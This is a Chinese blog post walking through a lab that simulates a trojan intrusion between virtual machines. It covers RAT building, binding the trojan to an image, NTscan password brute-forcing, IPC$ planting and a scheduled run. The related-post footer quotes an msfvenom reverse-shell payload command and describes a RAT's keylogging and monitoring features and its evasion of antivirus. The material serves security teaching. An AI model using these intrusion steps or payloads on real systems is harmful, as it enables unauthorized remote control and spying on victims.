攻击 | 神奇的木马(虚拟机模拟木马入侵)

最新推荐文章于 2025-03-29 22:21:57 发布
最新推荐文章于 2025-03-29 22:21:57 发布
阅读量5.2k 收藏 41
点赞数 5
分类专栏: 网安 文章标签: 网络空间安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44421798/article/details/100190879
版权

攻击 | 神奇的木马(在虚拟机环境中模拟木马入侵)

→木马渊源

木马最早源于古希腊与特洛伊的战争,公元前十二世纪初,迈锡尼联合希腊各城邦组成联军,渡海远征特洛伊,战争延续十年之久,史称“特洛伊战争”特洛伊也因此闻名。

详情可见搜狗百科(https://www.sogou.com/link?url=DOb0bgH2eKjRiy6S-EyBciCDFRTZxEJgz1aVEc1sNcJVy6JvJfJZBvCJC-1zdrX6cuq-Yw0FZZWwd81skDFJS0HUolH0edGv2jSEC-yXxtVbgwbDrZgwISXlDdIxVgmF1mit9m_XrM4.
在这里插入图片描述

木马通常称为黑客程序,恶意代码,也称为特洛伊木马。同时也是基于远程控制的黑客工具。

→实验模拟

实验目的

通过经典的木马攻击还原场景,来学习木马的制作,并实现植入木马对目标主机进行完全控制。

实验设备

VMware V12.0版本
WindowsXP----------------服务端-----黑客机----192.168.5.129
Windows server2007-----客户端------目标机----192.168.5.128

实验工具

灰鸽子或者大白鲨远程控制器工具
NTscan10暴力破解工具
捆绑器工具
WindowsXP----------------服务端-----黑客机----192.168.5.129
Windows server2007-----客户端------目标机----192.168.5.128

→实验原理

一图了解实验原理
在这里插入图片描述

→具体实验

1.在虚拟机中打开XP系统和2003系统,设置两者IP,保证两者在同一网段且能够相互ping通

打开虚拟机,设置两者IP地址,保证两者在同一网段,且能够相互ping通
在这里插入图片描述
在这里插入图片描述

2.XP机进行操作
2.1打开光盘一获得:解压器工具+木马制作工具灰鸽子远程控制+暴力破解工具NTscan

光盘一:解压器+木马制作+暴力破解
在这里插入图片描述

解压器操作
在这里插入图片描述

2.2打开光盘二获得:捆绑器工具

光盘二:hack获得“捆绑器”
在这里插入图片描述

3.利用灰鸽子或大白鲨制作木马

灰鸽子制作木马
在这里插入图片描述
在这里插入图片描述

4.利用捆绑工具将图片与木马捆绑

捆绑
在这里插入图片描述

5.利用暴力破解工具破解目标机密码

使用NTscan工具破解IP地址范围,完成暴力破解
在这里插入图片描述

6.利用命令行在黑客机将木马植入到目标机

打开目标主机建立IPC$
在这里插入图片描述

植入木马目标主机
在这里插入图片描述
在这里插入图片描述

7.可设置时间定时启动目标机的木马

设置目标主机运行木马
查看时间
定时启动
在这里插入图片描述
在这里插入图片描述

8.完成木马入侵基本工程

成功控制
在这里插入图片描述

[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
热门推荐
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,希望对您有所帮助~
大白鲨远程控制V1.5
04-20
大白鲨远控1.5 运行平台:Win2K、WinXP、Win03、WinVista、Win07、(Win2008没测试) 软件简介: 单一exe,不带DLL文件! DATA文件夹里面的有两个RAR文件,分配为两个功能完全相同的DATA.FILE: “DATA(注入进程兼容Win7).rar” //该DATA无壳, 没配置前 110KB ,压缩 51KB "DATA(注入进程不兼容Win7).rar" //该DATA无壳, 没配置前 390KB ,压缩 173KB 功能简介: 1.屏幕监控,可以查看对方屏幕以及鼠标监控、键盘监控、强制关闭显示器等。 2.视频监控、可以查看对方视频,含有MSH263,IndeoVideo5.04,IntelIndeo(R)VideoR3.2编码 3.CMD命令:模拟CMD。也就是telnet命令执行 4.文件管理:磁盘空间查看、文件浏览、WinRAR压缩解压(必须有安装WINRAR)、执行文件(以后缀执行/Exe类型执行)、上传、下载、删除、新建(文件/文件夹)... 5.进程管理:进程信息查看。包括进程创建时间,父进程ID等..,可以结束进程。 6.服务管理:服务信息查看。包括服务的PID、启动时间、模块路径、描述。等查看,可以对服务进行基本操作. 7.注册表管理:类似于注册表模拟器,可以删除指定注册表值,键,以及新建等.. 8.窗口管理:可以设置窗口标题、对窗口的其他操作,比如关闭窗口(包括父窗口)或隐藏窗口等... 9.键盘记录:可以查看对方输入了哪个键盘按键。 10.附加功能:分为“信息查看”与“插件管理”。 <1>信息查看:可以看对方系统信息,服务端配置信息,宽带信息需要上传指定插件才能查看! <2>插件管理”能上传插件“比如HTTP代理与宽带密码查看插件”。 11.其他管理:有点类似与恶作剧,有禁止鼠标活动与键盘活动功能==,还有查看剪切板字符串==等功能。 12.批量操作:分为“筛选主机”、“修改配置”、“发送信息”、“其它操作”4个面板! <1>筛选主机:可以筛选你先要进行批量操作的主机,如内存大于512MB,小于2048MB的主机=。 <2>修改配置:可以修改上线信息,如IP、端口或者备注! <3>发送信息:分为发生“窗口信息”和“屏幕字体”两种信息。 <4>其它操作:可以下载URL文件,隐藏打开网页、重启、关机、开启3389端口、更新被控端==功能 __________________________________________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^升级日志^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ UpdateTo1.5 1.31升级到1.4更新了有些多,因此该版本主要是1.4的修正版本!增强稳定性 更新日志: 1.增强稳定性 2.修正控制端与被控端停止视频编码/解码器的时候没释放掉的一些内存 3.其它代码更新... 修复BUG 1.其它远控的被控端会上线到大白鲨这来 2.被控端异常断线探测修正 3.控制端关闭的时候有其他网络的程序连接到大白鲨来可能会导致客服端卡住的bug 不兼容1.31版本之前的 __________________________________________________________________________________________________________ UpdateTo1.4 更新日志: 1.更新网络模块,可同时上线上万主机 2.屏幕模块,添加键盘发送、图片保存、透明区域截取、全屏模式、屏幕缩放模式、组合键发送=;(核心算法为DG大哥的,博客iamgyg.blog.163.com) 3.更新视频模块,支持USB无驱视频,传输速度流畅,添加 IntelIndeo(R)VideoR3.2 和 IndeoVideo5.04 编码 4.服务端添加非正常断线探测; 5.进程模块(添加显示进程创建时间,以及优化代码) 6.服务模块(添加已启动的服务的启动时间查看还有PID,以及优化代码) 7.注册表模块,以及代码优化 8.窗口模块(添加PID与窗口进程所在路径查看) 9.添加主机信息复制, 10.添加判断WIN7系统 11.其它更新 修正BUG 1.文件管理的文件修改时间显示错误。 2.时间久了会可能会出现播放有主机下线声音(实际上没看到主机下线) 3.修复win7系统下注入进程后无法创建线程,导致无法连接网络, 4.修复截取系统登录界面白屏
rootkit模拟木马病毒
ILP-Linux的博客
02-14 6724
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 在我们生活中,经常看的电视剧谍战片里有一个必不可少的人物——卧底。它的职责就是:良好的伪装使得对手对此长时间毫无察觉;他赢得敌人的信任并因此身居要职,这使得他能够源源不断地获取重要情报并利用其独特渠道传送回去。https://...
简单木马攻击
最新发布
2301_81015455的博客
03-29 397
简单木马攻击使用Kali生成简单木马,诱导下载,进行控制攻击
Rootkit 之 adore-ng 模拟木马病毒
02-13 1754
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 在我们生活中,经常看的电视剧谍战片里有一个必不可少的人物——卧底。它的职责就是:良好的伪装使得对手对此长时间毫无察觉;他赢得敌人的信任并因此身居要职,这使得他能够源源不断地获取重要情报并利用其独特渠道传送回去。 而我们今天要模...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2579
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
应急响应实战之木马实战
qq_52074678的博客
05-09 2233
一.应急响应流程回顾 二.木马攻击模拟实验 (特别注意本次实验仅仅用于模拟木马攻击实验,不能拿去搞破坏,家有家规,国有国法,希望大家知法守法.) 1.环境介绍 攻击机 kali: 下载地址 被攻击(注意关闭防火墙) win10: 下载地址: 木马脚本源码 msfvenom -a -x86 --platfrom windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口号 -b "\x00" -e x86/sh
虚拟入侵服务器,面向虚拟化平台的入侵检测系统的研究
weixin_42514910的博客
07-31 362
面向虚拟化平台的入侵检测系统的研究 (3页) 本资源提供全文预览,点击全文预览即可全文预览,如果喜欢文档就下载吧,查找使用更方便哦!9.9 积分面向虚拟化平台的入侵检测系统的研究面向虚拟化平台的入侵检测系统的研究摘要:在当今虚拟网络中,传统的入侵检测系统明显表现出 不适应性。虽然它能够向被监测中的活动主机给予很好的安全保护, 清晰地反馈对受监测中网络的运作情况,并对系统发出异常请求的数 据包进行...
VMware win10虚拟机跑一个简单的木马实验
m0_51478477的博客
06-14 1385
基于python实现一个简单的木马实验:在客户端中读取服务端的文件,在VMware中跑通。
虚拟机驱动的入侵检测系统仿真平台设计与实现
本文主要探讨了"基于虚拟机技术的入侵检测系统攻击仿真平台的研究和实现"这一主题。随着网络安全形势日益严峻,入侵检测系统的应用范围日益扩大,对系统的可靠性和稳定性要求越来越高。为了满足这些需求,传统的攻击...
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接
Zeker62的博客
08-06 3274
实验环境建议在虚拟机上运行 科学无罪,所有实验环境都在局域网内进行 实验条件 两个Windows虚拟机 一个安装大白鲨远程控制软件 两个虚拟机开启ftp服务(用于木马文件之间的传输) 大白鲨远程控制软件是一个比较旧的攻击软件 大白鲨远程控制 2010 Bate1(v1.6) 运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008 软件简介: 兼容1.4~1.3版本 单一exe,不带DLL文件(无可没配置前114KB,压缩52KB)! 注入进程兼容win7/win8
大白鲨远控v1.5绿色版
04-30
大白鲨远控v1.5 大白鲨远控v1.5 大白鲨远控v1.5 杀软会提示木马,过360
虚拟主机安全配置之脚本木马防护
weixin_33728708的博客
05-13 261
2019独角兽企业重金招聘Python工程师标准>>> ...
[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
04-08 4432
神奇木马 实现目标 通过经典的木马攻击还原场景,来学习木马的制作,并实现植入木马对目标主机进行完全控制。 木马概述 木马通常称为黑客程序,恶意代码,也称特洛伊木马 基于远程控制的黑客工具 木马特性 隐蔽性 潜伏性 再生性 木马组成 客户端程序 安装在攻击者方大的控制台,他负责远程遥控指挥 服务端程序 即木马程序,它被隐藏安装在被攻击者的电脑上,目标主机也称肉鸡 木...
绝密:三步教你轻松窃取VMware虚拟机及其数据
weixin_34050389的博客
02-02 804
是否记得曾经虚拟化过的邮件服务器或者薪酬支付系统?如果拥有访问虚拟化工作环境管理员权限,就可以轻松地进入该虚拟化工作环境,并且窃取所有的数据,而又不会留下任何痕迹。从数据中心偷走一个物理服务器是非常困难的,并且也很容易被人发现。但是无论在任何位置都可以通过网络偷窃一台虚拟机,把该虚拟机装在闪存盘中就可以轻易地带走。 虚拟化技术可以提供很多物理服务器无法比拟的优势,但是仍...
如何让虚拟机与主机远程控制
m0_60353617的博客
07-21 3360
一,安装 安装虚拟机启动软件,根据步骤进行安装,启动完成后,打开虚拟机点击Windows安全中心,病毒和威胁防护与网络防火墙和网络保护全部关闭。 打开远程桌面 按照相同办法对真机进行上述操作。 二,地址查询 进入网络和Internet界面吗,选择以太网,点击更改适配器选项 右击选择状态,查看详细信息查看IPv4地址。 在真机中按Windows+R,输入mstsc,输入上述IPv4地址,以及用户名密码,确定。 , 选择是完成连接。 完成控制。 ...
VMware虚拟机中安装的操作系统如何访问真实主机
yw1688的专栏
01-26 3723
国庆长假有时间,准备把硬盘里收集的一些软件做成集成安装包!于是就安装了虚拟机进行测试,虚拟机关机是VMware6.0 深度完美精简版,虚拟机内安装的系统是DeepinXP-5.7,安装好后发现,虚拟机内只有C盘、D盘(虚拟机CD-ROM)和A盘(软驱),无法访问真实主机硬盘内的文件!测试软件时只能通过虚拟机的CD-ROM来测试ISO镜像安装文件,对于exe安装文件,虚拟机内看不到!  请问VMw
信息安全技术实践之木马捆绑模拟实验小记
小啊呜的博客
09-22 3177
信息安全技术实践之木马捆绑模拟实验小记 实践任务描述 实现过程记录 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ParallelLight

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值